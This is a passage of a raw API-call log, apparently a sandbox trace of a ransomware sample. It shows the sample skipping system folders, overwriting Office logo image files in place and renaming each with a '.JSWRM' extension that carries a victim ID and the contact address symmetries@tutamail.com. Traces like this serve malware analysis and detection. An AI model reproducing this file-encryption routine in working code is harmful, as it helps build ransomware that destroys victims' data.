(lpString1="OneNoteLogo.scale-100.png", lpString2="documents and settings") returned 1 [0133.382] lstrcmpiW (lpString1="OneNoteLogo.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.382] lstrcmpiW (lpString1="OneNoteLogo.scale-100.png", lpString2="system volume information") returned -1 [0133.382] lstrcmpiW (lpString1="OneNoteLogo.scale-100.png", lpString2="msocache") returned 1 [0133.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.scale-100.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.scale-100.png", cchWideChar=25, lpMultiByteStr=0x241268, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 25 [0133.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.scale-100.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.scale-100.png", cchWideChar=25, lpMultiByteStr=0x241330, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 25 [0133.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.383] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2267) returned 1 [0133.383] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.383] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8d0, lpOverlapped=0x0) returned 1 [0133.385] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.385] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8d0, lpOverlapped=0x0) returned 1 [0133.385] CloseHandle (hObject=0x238) returned 1 [0133.385] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.386] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6d794e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6d794e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6d794e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xae7, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogo.scale-140.png", cAlternateFileName="ONENOT~2.PNG")) returned 1 [0133.386] lstrcmpiW (lpString1="OneNoteLogo.scale-140.png", lpString2=".") returned 1 [0133.386] lstrcmpiW (lpString1="OneNoteLogo.scale-140.png", lpString2="..") returned 1 [0133.386] lstrcmpiW (lpString1="OneNoteLogo.scale-140.png", lpString2="...") returned 1 [0133.386] lstrcmpiW (lpString1="OneNoteLogo.scale-140.png", lpString2="windows") returned -1 [0133.386] lstrcmpiW (lpString1="OneNoteLogo.scale-140.png", lpString2="recovery") returned -1 [0133.386] lstrcmpiW (lpString1="OneNoteLogo.scale-140.png", lpString2="perflogs") returned -1 [0133.387] lstrcmpiW (lpString1="OneNoteLogo.scale-140.png", lpString2="documents and settings") returned 1 [0133.387] lstrcmpiW (lpString1="OneNoteLogo.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.387] lstrcmpiW (lpString1="OneNoteLogo.scale-140.png", lpString2="system volume information") returned -1 [0133.387] lstrcmpiW (lpString1="OneNoteLogo.scale-140.png", lpString2="msocache") returned 1 [0133.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.scale-140.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.scale-140.png", cchWideChar=25, lpMultiByteStr=0x240f70, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 25 [0133.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.scale-140.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.scale-140.png", cchWideChar=25, lpMultiByteStr=0x241178, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 25 [0133.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.388] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2791) returned 1 [0133.388] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.388] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xae0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xae0, lpOverlapped=0x0) returned 1 [0133.390] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.390] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xae0, lpOverlapped=0x0) returned 1 [0133.390] CloseHandle (hObject=0x238) returned 1 [0133.390] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.391] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6fdbb6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6fdbb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd46, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogo.scale-180.png", cAlternateFileName="ON52BA~1.PNG")) returned 1 [0133.391] lstrcmpiW (lpString1="OneNoteLogo.scale-180.png", lpString2=".") returned 1 [0133.391] lstrcmpiW (lpString1="OneNoteLogo.scale-180.png", lpString2="..") returned 1 [0133.391] lstrcmpiW (lpString1="OneNoteLogo.scale-180.png", lpString2="...") returned 1 [0133.391] lstrcmpiW (lpString1="OneNoteLogo.scale-180.png", lpString2="windows") returned -1 [0133.391] lstrcmpiW (lpString1="OneNoteLogo.scale-180.png", lpString2="recovery") returned -1 [0133.392] lstrcmpiW (lpString1="OneNoteLogo.scale-180.png", lpString2="perflogs") returned -1 [0133.392] lstrcmpiW (lpString1="OneNoteLogo.scale-180.png", lpString2="documents and settings") returned 1 [0133.392] lstrcmpiW (lpString1="OneNoteLogo.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.392] lstrcmpiW (lpString1="OneNoteLogo.scale-180.png", lpString2="system volume information") returned -1 [0133.392] lstrcmpiW (lpString1="OneNoteLogo.scale-180.png", lpString2="msocache") returned 1 [0133.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.scale-180.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.scale-180.png", cchWideChar=25, lpMultiByteStr=0x241290, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 25 [0133.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.scale-180.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.scale-180.png", cchWideChar=25, lpMultiByteStr=0x241308, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 25 [0133.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.393] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3398) returned 1 [0133.393] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.393] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xd40, lpOverlapped=0x0) returned 1 [0133.396] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.396] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xd40, lpOverlapped=0x0) returned 1 [0133.397] CloseHandle (hObject=0x238) returned 1 [0133.397] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.398] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6fdbb6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6fdbb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x80d, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogo.scale-80.png", cAlternateFileName="ONF020~1.PNG")) returned 1 [0133.398] lstrcmpiW (lpString1="OneNoteLogo.scale-80.png", lpString2=".") returned 1 [0133.398] lstrcmpiW (lpString1="OneNoteLogo.scale-80.png", lpString2="..") returned 1 [0133.398] lstrcmpiW (lpString1="OneNoteLogo.scale-80.png", lpString2="...") returned 1 [0133.398] lstrcmpiW (lpString1="OneNoteLogo.scale-80.png", lpString2="windows") returned -1 [0133.398] lstrcmpiW (lpString1="OneNoteLogo.scale-80.png", lpString2="recovery") returned -1 [0133.398] lstrcmpiW (lpString1="OneNoteLogo.scale-80.png", lpString2="perflogs") returned -1 [0133.398] lstrcmpiW (lpString1="OneNoteLogo.scale-80.png", lpString2="documents and settings") returned 1 [0133.398] lstrcmpiW (lpString1="OneNoteLogo.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.398] lstrcmpiW (lpString1="OneNoteLogo.scale-80.png", lpString2="system volume information") returned -1 [0133.398] lstrcmpiW (lpString1="OneNoteLogo.scale-80.png", lpString2="msocache") returned 1 [0133.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.scale-80.png", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0133.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.scale-80.png", cchWideChar=24, lpMultiByteStr=0x2411c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 24 [0133.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.scale-80.png", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0133.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.scale-80.png", cchWideChar=24, lpMultiByteStr=0x2410d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 24 [0133.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.399] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2061) returned 1 [0133.399] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.399] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x800, lpOverlapped=0x0) returned 1 [0133.401] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.401] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x800, lpOverlapped=0x0) returned 1 [0133.401] CloseHandle (hObject=0x238) returned 1 [0133.402] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.403] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6fdbb6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6fdbb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x73a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogoSmall.contrast-black_scale-100.png", cAlternateFileName="ON193B~1.PNG")) returned 1 [0133.403] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-100.png", lpString2=".") returned 1 [0133.403] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-100.png", lpString2="..") returned 1 [0133.403] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-100.png", lpString2="...") returned 1 [0133.403] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-100.png", lpString2="windows") returned -1 [0133.403] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-100.png", lpString2="recovery") returned -1 [0133.404] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-100.png", lpString2="perflogs") returned -1 [0133.404] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0133.404] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.404] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-100.png", lpString2="system volume information") returned -1 [0133.404] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-100.png", lpString2="msocache") returned 1 [0133.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-black_scale-100.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-black_scale-100.png", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 45 [0133.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-black_scale-100.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-black_scale-100.png", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 45 [0133.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.405] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1850) returned 1 [0133.405] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.405] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x730, lpOverlapped=0x0) returned 1 [0133.409] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.409] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x730, lpOverlapped=0x0) returned 1 [0133.409] CloseHandle (hObject=0x238) returned 1 [0133.409] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.410] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6fdbb6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6fdbb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e4, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogoSmall.contrast-black_scale-140.png", cAlternateFileName="ON585A~1.PNG")) returned 1 [0133.410] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-140.png", lpString2=".") returned 1 [0133.410] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-140.png", lpString2="..") returned 1 [0133.410] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-140.png", lpString2="...") returned 1 [0133.410] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-140.png", lpString2="windows") returned -1 [0133.410] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-140.png", lpString2="recovery") returned -1 [0133.410] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-140.png", lpString2="perflogs") returned -1 [0133.410] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0133.410] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 